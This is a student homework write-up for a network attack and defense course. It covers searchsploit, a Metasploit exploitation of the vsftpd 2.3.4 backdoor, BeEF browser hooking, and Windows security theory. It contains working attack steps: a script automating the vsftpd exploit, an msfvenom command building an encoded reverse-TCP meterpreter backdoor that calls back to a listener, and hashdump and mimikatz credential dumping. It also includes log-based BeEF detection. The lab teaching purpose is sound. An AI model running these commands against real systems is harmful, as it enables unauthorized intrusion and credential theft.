2017-2018-2 20179202 "Network Attack and Defense Technology" Week 7 Homework

Retrieval and Exploitation of Vulnerabilities

searchsploit searches a local copy of Exploit-DB (the exploitdb package in Kali; searchsploit -u refreshes it), so it works offline. Search terms are combined with AND and matched case-insensitively, so every additional term narrows the result set rather than widening it: searchsploit vsftpd lists every vsftpd entry, while searchsploit vsftpd 2.3.4 keeps only entries whose title mentions both.
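The AND behaviour is easy to misread as OR, so here is an added example (not from the original write-up) that reproduces searchsploit's term matching over a small, constructed slice of Exploit-DB's files_exploits.csv. The rows, ids and authors below are made up to show the filtering and are not real Exploit-DB entries; searchsploit itself additionally offers -t to match titles only and --exclude="term" to drop noise.

```shell
#!/bin/sh
# Added example, not part of the original write-up: emulate searchsploit's
# AND matching over a constructed slice of Exploit-DB's files_exploits.csv
# (columns: id,file,description,date,author,type,platform,port).
# The rows and ids below are constructed for the demonstration only.
set -eu

SAMPLE_DB="$(mktemp)"
trap 'rm -f "$SAMPLE_DB"' EXIT
cat > "$SAMPLE_DB" <<'EOF'
id,file,description,date,author,type,platform,port
10001,exploits/unix/remote/10001.rb,"vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)",2011-07-05,constructed,remote,unix,21
10002,exploits/unix/remote/10002.py,"vsftpd 2.3.4 - Backdoor Command Execution",2021-04-12,constructed,remote,unix,21
10003,exploits/linux/dos/10003.py,"vsftpd 3.0.3 - Remote Denial of Service",2020-09-09,constructed,dos,linux,21
10004,exploits/linux/remote/10004.rb,"ProFTPD 1.3.3c - Backdoor Command Execution (Metasploit)",2010-12-02,constructed,remote,linux,21
EOF

# search_db DB TERM...: keep only rows that contain every term
# (case-insensitive, fixed-string), which is searchsploit's default.
search_db() {
    db="$1"; shift
    rows="$(tail -n +2 "$db")"            # drop the CSV header
    for term in "$@"; do
        rows="$(printf '%s\n' "$rows" | grep -i -F -- "$term" || true)"
    done
    printf '%s\n' "$rows"
}

# count_hits DB TERM...: number of matching rows (prints 0 when none match).
count_hits() {
    search_db "$@" | grep -c . || true
}

# Each extra term narrows the set: 3 -> 2 -> 1 rows.
count_hits "$SAMPLE_DB" vsftpd
count_hits "$SAMPLE_DB" vsftpd 2.3.4
count_hits "$SAMPLE_DB" vsftpd 2.3.4 metasploit
```

Because every term must match, a query like searchsploit vsftpd 2.3.4 backdoor is the way to narrow, while an alternative spelling (vsFTPd, vsftp) needs a separate search or a shorter common stem.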

Metasploit basics

1. Start the service:

To use Metasploit in Kali, first start the PostgreSQL database with the command service postgresql start, then launch the console with msfconsole. With the database up, msf can cache its module index and store the hosts, services and credentials found during an engagement; db_status inside the console confirms that it is connected.

2. Path introduction

In Kali, Metasploit is installed under /usr/share/metasploit-framework (the modules live under modules/, for example modules/exploits/unix/ftp/vsftpd_234_backdoor.rb).

3. Basic commands

  • msfconsole: opens the Metasploit console
  • msfvenom: replaces the older pair msfpayload (payload and shellcode generation) and msfencode (encoding of a payload); both jobs are now done by this single tool

4. Test Example

Start by scanning the target host with nmap -sV, which reports the software and version behind each open port. The result shows an FTP server, vsftpd 2.3.4. This release contains a backdoor (hence the module name vsftpd_234_backdoor below), and triggering it gives a remote attacker a root shell on the target.

Below we use Metasploit to carry out the attack. Enter msfconsole on the command line to open the console, then enter search vsftpd to list the modules whose name or description matches vsftpd.

The module exploit/unix/ftp/vsftpd_234_backdoor targets exactly the scanned version 2.3.4, so it is the one to use. Enter use exploit/unix/ftp/vsftpd_234_backdoor; the prompt changes to the module path. show options lists the settings the module needs: RHOST, the target address (newer Metasploit releases call it RHOSTS and accept either name), and RPORT, which defaults to 21. set RHOST 192.168.199.139 sets the target IP.

Next choose the payload: type set payload and press Tab to complete cmd/unix/interact (the backdoor opens a raw command shell, so this payload simply interacts with it). Run show options again to confirm that everything required is set, then enter exploit to launch the attack.

The result is a shell on the target host running as root. Commands such as id and ifconfig confirm the privilege level and the network configuration, showing that the attack succeeded.
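The steps above are typed interactively, which is fine once but error-prone when repeated. Here is an added example (not from the original write-up) that turns them into a Metasploit resource script and adds the check a practitioner wants first: only fire the module when the FTP banner actually announces vsftpd 2.3.4. The target 192.168.199.139:21 is the write-up's; it assumes msfconsole, nc and timeout are installed, and grab_banner, which needs network access, is not run offline.

```shell
#!/bin/sh
# Added example, not part of the original write-up: the manual msfconsole
# steps as a resource script, gated on the FTP banner announcing vsftpd 2.3.4.
# Assumptions: target 192.168.199.139:21 as in the write-up; msfconsole, nc
# and timeout are installed; grab_banner needs network access and is not
# exercised here.
set -eu

# banner_is_vsftpd_234 BANNER: true when the 220 greeting names vsftpd 2.3.4
# (vsftpd greets with "220 (vsFTPd 2.3.4)").
banner_is_vsftpd_234() {
    printf '%s\n' "$1" | grep -q -i -E '^220 .*vsftpd 2\.3\.4'
}

# grab_banner HOST PORT: first line of the FTP greeting, 5 s limit, CR stripped.
grab_banner() {
    timeout 5 nc "$1" "$2" < /dev/null | head -n 1 | tr -d '\r'
}

# write_vsftpd_rc RHOST RPORT OUT: the write-up's commands as a resource
# script. The checks are crude (digits and dots only) but keep shell
# metacharacters out of the rc file.
write_vsftpd_rc() {
    case "$1" in
        *[!0-9.]*|'') echo "bad RHOST: $1" >&2; return 1 ;;
    esac
    case "$2" in
        *[!0-9]*|'') echo "bad RPORT: $2" >&2; return 1 ;;
    esac
    cat > "$3" <<EOF
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOST $1
set RPORT $2
set payload cmd/unix/interact
show options
exploit
EOF
}

# attack_if_vulnerable HOST PORT: grab the banner and only then run the module.
attack_if_vulnerable() {
    banner="$(grab_banner "$1" "$2")"
    if banner_is_vsftpd_234 "$banner"; then
        write_vsftpd_rc "$1" "$2" vsftpd.rc
        msfconsole -q -r vsftpd.rc
    else
        echo "banner '$banner' is not vsftpd 2.3.4; not firing the module" >&2
        return 1
    fi
}

# Offline demonstration of the gate and of the generated script:
banner_is_vsftpd_234 '220 (vsFTPd 2.3.4)' && echo "2.3.4: would attack"
banner_is_vsftpd_234 '220 (vsFTPd 3.0.3)' || echo "3.0.3: skipped"
RC="$(mktemp)"
write_vsftpd_rc 192.168.199.139 21 "$RC" && cat "$RC"
rm -f "$RC"
```

On a real engagement the call is attack_if_vulnerable 192.168.199.139 21; msfconsole -q -r runs the generated script line by line exactly as if it had been typed at the prompt.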

Meterpreter

Meterpreter is Metasploit's advanced payload. It is delivered as the payload of a successful exploit and, once running, gives the attacker a control channel back to the target, the meterpreter shell. On Windows it runs in memory inside the exploited or injected process rather than as a separate executable on disk, which is what makes it convenient for post-exploitation.

1. Generate meterpreter backdoor

The chosen payload is windows/meterpreter/reverse_tcp (Windows, reverse TCP connection back to the attacker). Generate the backdoor with msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.199.161 LPORT=2333 -e x86/shikata_ga_nai -i 5 -f exe -o /root/backdoor.exe: -p selects the payload, LHOST and LPORT are the attacker's listener address and port, -e x86/shikata_ga_nai -i 5 runs the polymorphic encoder five times, -f exe produces a Windows executable and -o names the output file. Note that encoders exist to avoid bad characters in exploit buffers; a shikata_ga_nai-encoded exe is well known to antivirus products and should not be relied on for evasion.

2. Monitoring settings

The generated backdoor needs a matching listener, otherwise the reverse connection has nothing to call back to. Open the Metasploit console and configure a reverse-connection handler (exploit/multi/handler with the same payload, LHOST and LPORT that were given to msfvenom):

3.meterpreter shell

When the target machine runs backdoor.exe, we get a meterpreter shell. Enter background to return to the msf prompt without closing the session. To get back into it, enter sessions to list the session IDs and sessions -i ID to select the one to resume.

Enter help in the meterpreter shell to list the available commands, such as sysinfo to display target system information, hashdump to dump the local password hashes from the SAM (this needs SYSTEM privileges, so run getsystem first if necessary), pwd to display the current path, and so on.

Meterpreter also has loadable extensions: type load and press Tab to list them, then load the one needed. load mimikatz was used to grab plaintext credentials from LSASS; in current Metasploit releases that extension has been superseded by load kiwi.

BeEF

Turning an XSS vulnerability into something useful usually needs a supporting framework, such as the hosted XSS platforms found online. On Kali, BeEF is a tool that is at least their equal. BeEF stands for Browser Exploitation Framework: a penetration testing tool focused on the browser, which extends a cross-site scripting foothold by hooking many browsers at once and running a large library of built-in command modules against them.

Enter beef-xss on the command line; the browser automatically opens the login page http://127.0.0.1:3000/ui/authentication. The default username and password are both beef (they are set in config.yaml and should be changed before real use). After logging in you reach the main interface.

Assume the host under test loads the page http://127.0.0.1:3000/demos/basic.html, a test page shipped with BeEF that includes its hook script. If that script include is injected into a real page through an XSS vulnerability, everyone who visits that page executes it and their browser is hooked by BeEF, that is, it appears under Online Browsers.

The hooked host then appears in the Online Browsers list on the left of the main interface, and the Current Browser tab on the right shows its details (browser, plugins, operating system, and so on).

The hook lasts as long as the hooked page stays open: during that time the browser keeps polling the BeEF server, which means it is effectively under control and attack commands can be sent to it.
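Seen from the defender's side, a hook is a browser fetching BeEF's hook script from the BeEF server (port 3000 by default) while viewing some other page, and a forward proxy or web server log records exactly that. The following added example (not from the original write-up) runs two checks over constructed access-log lines: a name-based one for hook.js, which is cheap but evadable because the hook file name is configurable in BeEF, and a stronger one that flags any script fetched from a host that is neither the referring page's host nor on an allowlist. The log lines are in combined log format with absolute URLs as a proxy records them; the client addresses, intranet and cdn.example.net hosts are made up, and 192.168.199.162:3000 is the address the write-up uses for its own BeEF/Metasploit machine.

```shell
#!/bin/sh
# Added example, not part of the original write-up: spotting BeEF hooks in
# proxy/web logs. Log lines are constructed (combined log format); the hosts
# are made up, 192.168.199.162 being the write-up's BeEF server.
set -eu

ACCESS_LOG="$(mktemp)"
trap 'rm -f "$ACCESS_LOG"' EXIT
cat > "$ACCESS_LOG" <<'EOF'
10.0.0.5 - - [10/Apr/2018:10:12:01 +0800] "GET http://intranet/forum/post?id=7 HTTP/1.1" 200 4812 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Apr/2018:10:12:01 +0800] "GET http://192.168.199.162:3000/hook.js HTTP/1.1" 200 93120 "http://intranet/forum/post?id=7" "Mozilla/5.0"
10.0.0.9 - - [10/Apr/2018:10:15:44 +0800] "GET http://cdn.example.net/js/hook.js?v=3 HTTP/1.1" 200 512 "http://shop.example.net/" "Mozilla/5.0"
10.0.0.7 - - [10/Apr/2018:10:20:10 +0800] "GET http://intranet/docs/hooks.js HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
EOF

# Field layout of a combined-format line: $1 client, $7 request URL,
# $11 referer (quoted). Host-extraction strips the scheme and the path.

# hook_fetches LOG: requests for a script literally named hook.js (BeEF's
# default name). Prints "client script_host referer"; false positives are
# expected, so this is a triage list, not an alert.
hook_fetches() {
    awk '$7 ~ /\/hook\.js(\?.*)?$/ {
            u = $7; sub(/^[a-z]+:\/\//, "", u); sub(/\/.*/, "", u)
            r = $11; gsub(/"/, "", r)
            print $1, u, r
         }' "$1" | sort -u
}

# foreign_script_loads LOG ALLOWED: any .js fetched from a host that is
# neither the referring page's host nor in the space-separated ALLOWED list.
# This catches a renamed hook file, at the cost of maintaining the allowlist.
foreign_script_loads() {
    awk -v allowed=" $2 " '
        $7 ~ /\.js(\?.*)?$/ {
            u = $7; sub(/^[a-z]+:\/\//, "", u); sub(/\/.*/, "", u)
            r = $11; gsub(/"/, "", r); sub(/^[a-z]+:\/\//, "", r); sub(/\/.*/, "", r)
            if (r != "-" && u != r && index(allowed, " " u " ") == 0) print $1, u, r
        }' "$1" | sort -u
}

echo "== hook.js fetches (name-based) =="
hook_fetches "$ACCESS_LOG"
echo "== scripts loaded from non-allowlisted third-party hosts =="
foreign_script_loads "$ACCESS_LOG" "cdn.example.net"
```

The name-based check flags both 10.0.0.5 and the harmless CDN fetch by 10.0.0.9; the origin-based check keeps only 10.0.0.5, whose intranet page pulled a script from an address that serves no legitimate content. On a real proxy log, feed foreign_script_loads the organisation's approved CDN hosts and review what remains.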

As an example, take the Raw JavaScript module under Misc: enter JavaScript code in the panel on the right that makes the target pop up a dialog, and click Execute to run it in the hooked browser.

If successful, a pop-up window will prompt:

and the Command results panel shows result=It worked!.

BeEF's proxy function is introduced next. Select the target host, right-click and choose Use as Proxy from the menu; HTTP requests are then issued by the hooked browser, so they originate from the victim's network position.

In the Rider tab, edit the request you want to send under Forge Request; here we keep the default.

Click Send, and the executed request is listed in the History tab.

Once it has finished (Processed shows complete), click the entry to view the request and response in detail. In this way the target can be made to visit a specific page, and if that page has a vulnerability, the target is attacked through it.

The above relies on the target acting as a proxy and then requesting a specific page. BeEF can also cooperate with Metasploit to penetrate the host further. BeEF does not load Metasploit by default; to use Metasploit's attack modules from BeEF, the following configuration is needed.

First enter the directory /usr/share/beef-xss/ and edit config.yaml, enabling the metasploit extension (set its enable flag to true).

Then enter the directory /usr/share/beef-xss/extensions/metasploit and edit its config.yaml: set host and callback_host to the local IP address, and adjust the custom path entry to where Metasploit is installed.

After that, open msfconsole and enter load msgrpc ServerHost=192.168.199.162 Pass=abc123. ServerHost must be the same address written into the extension's host field, and Pass must match the password configured there (abc123 is the value BeEF ships with), otherwise BeEF cannot authenticate to the RPC service.

Now enter /usr/share/beef-xss/ and run ./beef -x to reload BeEF's modules so that the Metasploit ones are picked up.

Restart the service with service beef-xss start and log in to BeEF again. A Metasploit category with many modules now appears in the command tree, and Metasploit's modules can be used against the hooked browser.

Textbook summary

1. Basic framework of Windows operating system

1. Windows is split into the operating system kernel, which runs in the processor's privileged mode, and user programs, which run in unprivileged mode: kernel mode and user mode.

2. Kernel mode: the Windows executive, the kernel, device drivers, the hardware abstraction layer (HAL), and the windowing and graphics subsystem.

3. User mode: system support processes, environment subsystem service processes, service processes, user applications, and the core subsystem DLLs.

4. Core mechanisms: process and thread management, memory management, file management, registry management, and network management.

5. Network stack (bottom up): the network card driver (physical layer), the NDIS library and miniport drivers (link layer), the TDI transport layer with the network protocol drivers (network and transport layers), the network APIs and TDI clients (session and presentation layers), and network applications and service processes (application layer).

2. Security Architecture and Mechanism

1. Reference monitor model: every access from a subject to an object is mediated by the reference monitor, which grants or denies it according to the security access control policy and records all access decisions in audit logs.

2. Core components: SRM, the security reference monitor (in the kernel); LSASS, the local security authority service (user mode); Winlogon/Netlogon; and the Event Log service.

3. Identity authentication mechanism:

  • Security principals: user, user group, computer

  • Authentication: local authentication (the Winlogon process, the GINA graphical logon window and the LSASS service) and network authentication (NTLM, LanMan, Kerberos).

4. Authorization and access control mechanism:

  • Objects: files, directories, registry keys, kernel objects, synchronization objects, private objects, pipes, memory, communication interfaces.

  • Security descriptor: Owner SID, Group SID, DACL (discretionary access control list, which grants or denies access) and SACL (system access control list, which drives auditing).

5. Security Audit Mechanism

6. Other security mechanisms: Security Center (firewall, automatic updates, virus protection), IPsec, the loading and verification mechanism, EFS (Encrypting File System), Windows File Protection, and the privacy and security protections built into the bundled IE browser.

3. Remote security attack and defense technology

1. Covers remote password guessing, attacks on Windows network services, and attacks on Windows clients and users.

2. Life cycle:

  • Windows security vulnerability discovery, exploitation and patching process
  • Public vulnerability disclosure repositories: CVE, NVD, SecurityFocus, OSVDB
  • Target-specific penetration testing process: vulnerability scanning, finding exploit code for the discovered vulnerabilities, carrying out the penetration test
  • Penetration testing with Metasploit: user interfaces (CLI, console, web, GUI)

3. Remote password guessing attack:

  • Remote password guessing targets the SMB protocol (TCP 445, TCP 139), and also the WMI service, Terminal Services (remote desktop), the MySQL database service and SharePoint. Tools include Legion, enum, smbgrind, NTScan, X-Scan and Fluxay.
  • Eavesdropping on and cracking the remote password exchange: weaknesses of the NTLM, LanMan, NTLMv2 and Kerberos network authentication protocols.
  • Defences against remote password guessing: turn off unnecessary and vulnerable network services, use the host firewall to restrict access to certain ports and services, restrict access to them at the network firewall, disable the outdated and flawed LanMan and NTLM protocols, and enforce a strong password policy.

4. Remote penetration attacks on network services: well-known vulnerabilities and attacks against the NetBIOS, SMB and MSRPC services, remote penetration of Microsoft network services on Windows, and remote penetration of third-party services on Windows.

Preventive measures: the fundamental one is to avoid and eliminate the vulnerabilities in the service software that these attacks depend on, which in practice means patching promptly and exposing as few services as possible.

4. Local security attack and defense technology

1. Local privilege escalation: exploiting flaws and vulnerabilities in the operating system kernel and in programs started with privileged user rights, which works because servers and desktops are often not patched promptly.

2. Theft of sensitive information:

  • Extracting Windows password hashes (copying the hash store, backing it up with rdisk, or using pwdumpx to pull hashes from the SAM file or from Active Directory)
  • Cracking Windows password hashes (L0phtCrack, John the Ripper, Cain)
  • Stealing users' sensitive data: find, findstr, grep, meterpreter
  • Defences against local theft of sensitive information: choose strong passwords, use more secure password hashing algorithms, and configure security policy carefully.

5. Covering tracks on Windows

1. Covering tracks: turning off auditing and clearing the event logs.

Preventive measures: configure system and network service auditing in advance, and write the logs to non-erasable media such as CD-ROM.

2. Remote control and backdoor program

  • Remote control: command-line tools (Netcat, psexec, meterpreter) and graphical tools (VNC, Radmin, pcAnywhere)
  • Backdoor programs: foreign (BO, BO2K) and Chinese (Glacier, Grey Pigeon, Guangwai Girl, PCshare, Disk Drive, Robot Dog, etc.)
  • Preventive measures: backdoor detection tools, anti-virus software, RootkitRevealer, IceSword.
